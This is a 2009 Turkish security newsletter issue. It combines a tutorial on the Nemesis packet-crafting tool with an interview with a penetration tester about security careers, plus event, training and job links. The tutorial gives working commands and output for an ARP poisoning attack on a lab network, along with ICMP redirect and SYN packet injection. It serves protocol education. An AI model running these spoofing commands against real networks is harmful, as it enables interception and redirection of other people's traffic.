[Haftanın güvenlik yazılımı]

Yazılım adı              :Nemesis
İndirme adresi        :http://nemesis.sf.net
Kategori                 : Paket üreteci
Ortam                    :Linux/UNIX
İşlevi                     :  İstenilen özellikte ethernet, arp, ip, icmp, igmp, tcp/udp, ospf, rip vs dns paketleri oluşturmak için kullanılır.


TCP/IP güvenliğinin öğrenilmesinde en önemli husus bu konuda pratik yapmaktır. Kitaplardan okunan OSI katmanı, TCP/IP protokol ailesi genelde akılda kalması zor konulardır. Bu konuları ve ilerisinde güvenliğini iyi kavrayabilmek için bol bol çalışma yapılmalıdır. TCP/IP konusunda pratik denildiğinde akla  gelen yazılım tipleri paket üreteçleri ve paket analiz(Sniffer) olmalıdır.

Kolay ve esnek kullanıma sahip paket üreteçlerinden biri de Nemesis'dir. Nemesis ile arp, ip, icmp, igmp, tcp/udp, ospf, rip vs dns protokollerine has tamamen özelleştirilebilir paketler üretmek mümkündür.

Nemesis Kullanımı

egitim ~ # nemesis
NEMESIS -=- The NEMESIS Project Version 1.4 (Build 26)

NEMESIS Usage:
nemesis [mode] [options]

NEMESIS modes:
arp
dns
ethernet
icmp
igmp
ip
ospf (currently non-functional)
rip
tcp
udp

NEMESIS options:
To display options, specify a mode with the option “help”.

Kullanımının sadece komut satırı aracılığı ile olması ilk aşamada bu aracı yeni öğrenecekler için bir dezavantaj gibi gözükse de sağladığı esnek yardım menüsü ile TCP/IP bilgisi olan herkes rahatlıkla kullanabilir.

Diğer bir artısı da yazacağınız mini scriptlerle bircok ag guvenligi programinin yaptigi isleri yaptirabilirsiniz.

Nemesis Kullanarak Paket oluşturma

İlk olarak oluşturmak istediğimiz paketlerle ilgili nasıl yardım alacağımızı görelim.

Mesela özel düzenlenmiş  arp paketi oluşturmak istiyoruz fakat bunu Nemesis ile nasıl yapıldığını bilmiyoruz. Hemen nemesis'in gerçekten adına uygun Help seçeneği yardımımıza koşacaktır.

#nemesis arp help

Komutu ile hangi tür arp paketleri oluşturulabileceği bilgisi alınır. Benzer şekilde diğer protokoller için de nemesis protokol_ismi help komutu işimize yarayacaktır.

~ # nemesis arp help,

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

ARP/RARP Usage:
arp [-v (verbose)] [options]

ARP/RARP Options:
-S

-D
-h
-m
-s
-r ({ARP,RARP} REPLY enable)
-R (RARP enable)
-P Data Link Options:
-d
-H
-M You must define a Source and Destination IP address.

ARP Paketleri Olusturmak

Ornek olarak sahte ARP paketleri ile ARP Poisoning saldırısı gerçekleştirelim

Ortam:

Gateway görevinde modem 192.168.1.1 00:13:64:22:39:3F
Masum Windows XP kullanıcısı 192.168.1.2 00-04-61-47-da-74
Nemesis ile ARP Spoof yapacak Linux kullanıcısı 192.168.1.4 00:0c:29:08:e2:48

Saldırı öncesi Windows sistemin arp tablosu.

C:\Console2>arp -a
Interface: 192.168.1.3 — 0×4
Internet Address Physical Address Type
192.168.1.1 00-13-64-22-39-3f dynamic
192.168.1.2 00-04-61-47-da-74 dynamic
192.168.1.4 00-0c-29-08-e2-48 dynamic

Nemesis ile ARP Spoof islemi.

~ # nemesis arp -d eth0 -r -v -S 192.168.1.1 -D 192.168.1.2 -h 00:0C:29:08:E2:48 -m 00:04:61:47:DA:74 -H 00:13:64:22:39:3f -M 00:04:61:47:DA:74

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

[MAC] 00:13:64:22:39:3F > 00:04:61:47:DA:74
[Ethernet type] ARP (0×0806)

[Protocol addr:IP] 192.168.1.1 > 192.168.1.2
[Hardware addr:MAC] 00:0c:29:08:e2:48 > 00:04:61:47:DA:74
[ARP opcode] Reply
[ARP hardware fmt] Ethernet (1)
[ARP proto format] IP (0×0800)
[ARP protocol len] 6
[ARP hardware len] 4

Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB.

ARP Packet Injected

Windows makinenin ARP tablosuna tekrar bakarsak 192.168.1.1 için ARP kaydının 00:13:64:22:39:3F’dan 00:0c:29:08:e2:48’a değiştiği görülecektir.

Nemesis ile TCP Paketleri Oluşturmak

Hedef sistemin 445. portuna SYN bayraklı paket gönderelim.

# nemesis tcp -S 192.168.1.4 -D 192.168.1.3 -fS -x 21 -y 445

komuttan da anlaşılacağı üzere Nemesis ile paket üretirken istediğimiz alanlarını (kaynak ip, kaynak port, özel alanlar)belirleyebiliyoruz.

ICMP Paketleri Oluşturmak

Nemesis ile icmp paketlerinin naıl oluşturulacağı detaylı olarak nemesis icmp help komutu çıktısında gösterilmiştir.

Mesela icmp mesajları arasında güvenlik açısından en tehlikelisi olan Icmp redirect paketi üretmek için aşağıdaki komut işimizi görecektir.

# nemesis icmp -v -S 192.168.1.1 -D 192.168.1.3 -G 192.168.1.4 -qRICMP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

[IP] 192.168.1.1 > 192.168.1.3
[IP ID] 8373
[IP Proto] ICMP (1)
[IP TTL] 255
[IP TOS] 0×00
[IP Frag offset] 0×0000
[IP Frag flags]
[ICMP Type] Redirect
[ICMP Code] Redirect For Network
[ICMP Pref Gateway] 192.168.1.4

Wrote 56 byte ICMP packet.

ICMP Packet Injected

 

[Haftanın Misafiri]

Güvenlik kahvesinin bu haftaki konuğu Olympos.org portalındaki çalışmalarından tanıdığımız  Sertan KOLAT


NGB: Kısaca kendinizden bahsedebilir misiniz?

Sertan KOLAT: İst.Üni. İngilizce İktisat okudum, İst. Üni. Enformatik bölümünde yüksek lisans eğitimini tamamladım. Çocukluğumdan beri bilgisayarlara, 1997’den beri güvenliğe aşırı ilgi duyuyorum. Üniversitede okuduğum sırada çalıştım. 1998’de sektöre girdim ve 2004’ten beri Avanteg’de güvenlik danışmanı olarak çalışıyorum. Burada penetrasyon testleri, ağ ve uygulama güvenlik denetimleri, kurulumlar, müşterilerimize ait üretici bağımsız IDS/IPS sistemlerinin yönetimini yapıyorum.

Yüksek lisans tezimi web güvenlik denetim yazılımlarının iyileştirilmesi üzerine yaptım. Otomatik web denetimlerindeki hatalı algılamaların azaltılması ve daha verimli bir denetim yazılımının nasıl olabileceği üzerine çalıştım. Tezdeki bazı önermeleri deneyebilmek için Arachne adlı bir web denetim yazılımı geliştirdim. Bir çok web denetim yazılımını inceledim ve inceliyorum. Genel ilgi odağım bu yazılımlar ve web uygulamaları güvenliği.

Bilgisayar başında uzun zaman geçirsem de, dışında da iyi zaman geçiriyorum. Film festivallerini ve sanatsal etkinlikleri takip etmeye çalışıyorum.  Deniz ve rüzgar hep ilgimi çekmiştir. Uzun bir dönem yaz aylarında amatör olarak yelken yaptım, bu sene rüzgar sörfüne başladım. İkisi de süper zevkli, herkese tavsiye ederim.



NGB:Güvenlik isine nasil bulastiniz

Sertan KOLAT:Tamamen bilinçli bir tercih. Çocukluğumdan beri telefon hatları, elektronik aletler, bozma, tamir, herşeyin nasıl çalıştığı ve yapıldığı merakı, detaycılık; her konuda bu neden böyle ve ben şu şekilde yaparsam ne olur soruları hep vardı. Internet’le tanışınca da bu böyle devam etti ve güvenlik ilgimi çekmeye başladı. Beni Unix tabanlı sistemlere iten de budur. 1998’de kendi programlarımı yazmaya başladım. Çoğu güvenlikle alakalı scanner ve malformed packet gönderen tipte yazılımlardı. Programcı değilim ancak güvenlikle ilgili bazı ufak yazılımlar geliştiriyorum.

Sürekli okuyarak, deneyerek, kurarak, bozarak, nasıl yapılır incelemeleri ile geçti. Eskiden Türkiye’de bilgi güvenliği alanında çalışabilecek sayılı firma vardı, İngilizce ve teknik bilgim iyi olduğu için okuma ve bilgi paylaşımlarıyla kendimi yetiştirdim. 2000 yılında bir ISP’de çalışmaya başlamamın da Internet altyapısı ve işleyişi, ağ cihazları, routing protokolleri, servis bilgileri, saldırı tipleri ve engelleme, farklı yerlerde farklı yapılarla ve işletim sistemleriyle uğraşma vb. konusunda bana çok katkısı oldu.


NGB: Turkiye'de bilgi guvenligi konusunu degerlendirebilir misiniz

Sertan KOLAT: Her konuda olduğu gibi, yarım yamalak. Güvenliğin çok iyi uygulanabilmesi için önce algılanması ve bir bütün olarak düşünülmesi gerekiyor. Güvenlik bir süreç ve her şeyin içerisine katılması gerekiyor. Bir düşünce yapısı haline gelmeli. Bunu çok iyi gerçekleştiren yerlerin sayısı az. Başına kötü bir durum gelen şirketler bile süreci uygulamaya koymuyor, sadece problemleri giderme yoluna gidiyor ve belki birkaç ürün yatırımı yapıyor. Yeni bir yazılım veya hizmet geliştirdiklerinde aynı sorunlar yine karşılarına çıkabiliyor.

Risk analizi ve risk yönetimi çok önemli. Risk değerlendirme sonucunda üst yönetimin güvenlik için bütçe ayırabilmesi de kolaylaşıyor. Fakat ürün yatırımı yapılsa da, hizmet ve bakım yatırımları yapılmıyor. Anlayış değişmediği taktirde bu şekilde devam edecek. Regülasyonlar ve kanuni sorumluluklar bu konuları olumlu yönde desteklediği için önemli.

Türkiye’de sayısız firmaya hizmet verdim. Aslında çok iyi ürünler kullanılıyor ama iyi bir yapılandırma, konfigürasyon ve bakım olmazsa ürünler yeterli faydayı sağlanamıyor. Bir çok firmada personelin bu konuya ayıracak vakti ve bilgisi de olmuyor.

Türkiye’deki pazar payıyla orantılı olarak güvenlik yazılımları da üretilmiyor. Ülkemizdeki bir çok girişim yeterli desteği bulamadığı için kötü sonuçlanıyor.

Toplumsal gelişim ve eğitim sisteminde düzenleme şart. En azından devlet okullarında İngilizce’ye çok çok daha fazla önem verilmeli. Planlı hareket etmeli, gelişmeli, okumalı, sormalı, üretmeli, araştırmalı ve komplekslerimizden arınmalıyız. Bunlar olmadan üzerine ne koyarsak koyalım, olmuyor.



NGB: Bu ise yeni baslayanlara neler onerirsiniz?

Sertan KOLAT: Hevesli olmalılar. Sevmeyen bir insan bu işi yapamaz diye düşünüyorum. Sürekli takip, kendisini güncelleme, geliştirme ve öğrenme gerekiyor. Bu tipte bir karakteriniz yoksa ve amacınız sadece para kazanmaksa şimdiden bu işe bulaşmayın.

Yeni başlayanlar ne yaparsa yapsın İngilizce’lerini ileri seviyeye getirmeleri gerekiyor. Planlı olmalılar. İleride nerede ve belki kimin yerinde olmak istediklerini düşünerek bir plan yapabilirler. Shon Harris'in CISSP Certification All-in-One Exam Guide, Fourth Edition veya daha yenisini mutlaka okumalarını öneririm. Bu kitap sayesinde güvenliğin farklı alanları konusunda genel bilgi sahibi olacaklardır. Belki bundan sonra kendilerine, ilgilerini daha fazla çeken bir alt dal seçebilirler.

Bir şirkette görev yapmak yerine, güvenlik hizmetleri veren, güvenlik ürünleri satan, distribütor vb. firmalarda çalışmalarını öneririm. Bu sayede çok farklı ürünler, farklı istekler, farklı altyapılar ve farklı insanlarla çalışma fırsatı bulursunuz. Aksi taktirde en iyi şirkette bile çalışsanız, çalışan sistemlere ve ağ altyapısına dokunamazsınız. Yeterince ürün ve farklı yapılar göremezsiniz.

Güvenlikle ilgili bir yerde çalışamıyorsanız, bir Internet servis sağlayıcının teknik departmanlarında çalışabilirsiniz. Özellikle güvenlik denetimi yapmak istiyorsanız bu önemli.

Kullandıkları yazılımların özelliklerini çok iyi öğrenmeliler. Yeni bir yazılım kurduğumda hemen neleri ayarlanabiliyor(options) incelerim. Doküman okumak önemli. Nmap, hping, tcpdump en yakın arkadaşlarınız. Örneğin nmap manual okuyun. Sadece yazılımlar değil bunların nasıl çalıştığını anlayabilmek çok önemli. Sectools.org’da bulunan yazılımları inceleyin. Bir güvenlik açığı duyurulduğunda nasıl ve neden olduğunu inceleyin, anlayın. Bu sizi geliştirecektir.

Network ve protokol bilgilerinizi geliştirin. Çok iyi TCP/IP ve protokol bilgisi şart. Mutlaka bir programlama dili bilin(Python, Ruby kolay öğrenilebilir) ve programlama genel mantığını kapmaya çalışın. Linux öğrenin. Mutlaka FreeBSD ve OpenBSD kurun, görün. GUI ortamlarından başta biraz sakının. İstediğiniz Linux dağıtımını kullanabilirsiniz, ama Gentoo’yu mutlaka bir kere kurun. Gentoo Linux Handbook’u tamamen okuyun.

Mail listelerine üye olun. Bugtraq ve full-disclosure’a mutlaka ve bunların dışında securityfocus.com’da ilginizi çeken tüm listelere, Türkçe bilgiguvenligi(yahoogroups), netsec, owasp-turkey olabilir.

Eski saldırılar, saldırı tipleri hakkında bilginiz olsun. İngilizce çok kaynak bulunuyor. Türkçe doküman istiyorsanız olympos.org’da kütüphane bölümündeki en eski yazılardan okumaya başlayabilirsiniz.

Bir RSS reader kullanın ve ilginizi çeken site ve blog’ları takip listenize alın. Security podcast’leri dinleyin. Miro gibi bir yazılımla podcast’leri kolayca takip edebilirsiniz.

Kitap okuyun. Bilgisayardan okuyabiliyorsanız Safari Books Online maliyet açısından daha uygun olabilir. İmkan varsa Amazon’dan satın alınabilir.

Zaman yönetimi ayrı bir konu ama chat vb size çok zaman kaybettirir.

Bu işlerde dikkat önemli. Yaptığınız işi çok iyi yapmaya özen göstermek, ancak mükemmeliyetçilikten de kaçınmak gerekiyor.

Sertifikasyon olayına çok fazla heves ediyorlar. Önce bilgilerini geliştirmelerini öneririm. Bunları tamamlayın, denetim tarafında ilerlemek istiyorsanız sizi uzun bir liste bekliyor.


NGB: Sizce 2015 yilinda bilgi guvenligi dunyasi hangi konulari konusuyor olacak?

Sertan KOLAT: Software as a service kavramının iyice oturacağını ve bir çok alanda gelişeceğini düşünüyorum. Veri iletişimi her alanda sürekli hızlanıyor. Mobil uygulamaların kullanımı artacak. Ses neredeyse tamamen IP altyapısına geçiyor.

Bunlara bağlı olarak web güvenliği, cloud computing, servis güvenliği, mobilitenin artmasıyla taşınabilen verinin güvenliği, VoIP güvenliği önemli olacaktır.

NGB: Zaman ayırarak sorularımıza cevap verdiğiniz için teşekkür ederiz.

[Etkinlikler]

-Sayısal Ortamda Savaş Sempozyumu
http://www.sasad.org.tr/haberler.asp?id=132

-Brocade Network Kurma Eğitim Serisi
http://www.brocade-event.com/3797_37_EMEANet/forms/turkey/index.html

-NSA co-hosting the 5th Annual IT Security Automation Conference
https://www.fbcinc.com/nist_autosec/atreg1.aspx

[Güvenlik Eğitimleri ]

-Beyaz Şapkalı Hacker(CEH) Eğitimi 31 Ekim 2009
http://www.guvenlikegitimleri.com/new/beyaz-sapkali-hacker-egitimi-31-ekim-2009


[Yarışma]

-SSHsliders
http://www.ethicalhacker.net/content/view/279/2/

-Network Forensics yarışması
http://forensicscontest.com/2009/10/10/puzzle-2-ann-skips-bail

[Dikkat çeken yazılar]

-Oracle Veri Tabanı Kurumsal Kullanıcı Güvenliği
http://www.bilgiguvenligi.gov.tr/teknik-yazilar-kategorisi/oracle-veri-tabani-kurumsal-kullanici-guvenligi

-2008 Web Application Security Statistics Published
http://projects.webappsec.org/Web-Application-Security-Statistics

-Back Link’lerin Hack Link olması ve Kek Link’ler
http://www.bilisimhukuk.com/2009/10/back-linklerin-hack-link-olmasi-ve-kek-linkler/

- Evil Maid goes after TrueCrypt
Joanna Rutkowska'dan fiziksel bilgisayara  fiziksel saldırı ile   truecrypt şifresinin nasıl ele geçirileceğine dair güzel bir yazı.
http://theinvisiblethings.blogspot.com/2009/10/evil-maid-goes-after-truecrypt.html

-SecTor Güvenlik konferansı sunumları
http://www.sector.ca/presentations.htm

[İş ilanları]

-NETWORK & SECURITY CONSULTANT 
http://www.kariyer.net/jobsearch/jobdetail.kariyer?arn=&sid=&ilankodu=475197&ilId=144

-Network ve Güvenlik Uzmanı 
http://www.kariyer.net/jobsearch/jobdetail.kariyer?arn=&sid=&ilankodu=470955&ilId=144

-Güvenlik Çözümleri Uzmanı 
http://www.kariyer.net/jobsearch/jobdetail.kariyer?arn=&sid=&ilankodu=471082&ilId=143

[Güvenlik bülteni hakkında]

Güvenlik E-bülteni  #08'e katkıda bulunanlar: Huzeyfe ÖNAL, Ömer ALBAYRAK,  Bâkır EMRE, Zafer YILMAZ, Bahtiyar Bircan, Cüneyt BERGEL 

Haftalık Güvenlik Bülteni Ağ güvenliği listesi Netsec'in üyeleri tarafından hazırlanmakta olup herkesin katkısına açıktır. Amacımız değişken güvenlik dünyasının farklı alanlarını yakından takip eden arkadaşların geçtiğimiz hafta içerisinde dikkatini çeken güvenlikle ilgili haberler, yazılar, araçların paylaşımıdır.

Güvenlik Bülteni Üyeliği

Güvenlik bültenini mail olarak almak isterseniz http://www.lifeoverip.net/newsletter/ adresine e-posta adresinizi bırakmanız yeterlidir.

Ağ Güvenliği( Netsec ) listesine üyeliğiniz varsa tekrar bülten üyeliğine gerek yoktur, bültenler listeye gönderilecektir.

Katkıda Bulunun

Güvenlik bülteninin bir sonraki sayısına katkı vermek için bu sayının başındaki linkten faydalanabilirsiniz. Link GoogleDocs'a uzanmaktadır ve üyelik gerektirmeksizin herkesin katkısına açıktır. Düzenleme konusunda eski sayılardan faydalanabilirsiniz.

Eski Sayılar

Güvenlik bülteninin eski sayılarına  http://www.lifeoverip.net/newsletter/ adresinden erişilebilir.


Bu sayı Mavituna Security Ltd. tarafindan sponsor edilmistir.


Copyright(c) 2009 Lifeoverip.Net